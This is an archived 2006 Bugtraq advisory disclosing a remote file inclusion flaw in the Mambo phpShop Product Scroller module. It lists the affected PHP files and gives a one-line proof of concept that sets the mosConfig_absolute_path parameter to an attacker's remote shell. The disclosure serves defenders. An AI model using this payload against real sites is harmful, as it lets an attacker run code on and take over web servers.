lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 18 Aug 2006 04:29:06 -0000 From: Outlaw@...a-security.net To: bugtraq@...urityfocus.com Subject: mambo-phphop Product Scroller Module R.F.I ########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: mambo-phphop Product Scroller Module #Attack method: Remote File Inclusion #Source: /* Load the phpshop main parse code */ require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' ); ************************************************************************************ #Vulnarable Files: mod_phpshop.php mod_phpshop_allinone.php mod_phpshop_cart.php mod_phpshop_featureprod.php mod_phpshop_latestprod.php mod_product_categories.php mod_productscroller.php mosproductsnap.php #Proof of Concept: #one of the files above.php?mosConfig_absolute_path=SHELL # #---------------------------------------------------------- # # #Contact : Outlaw@...a-security.net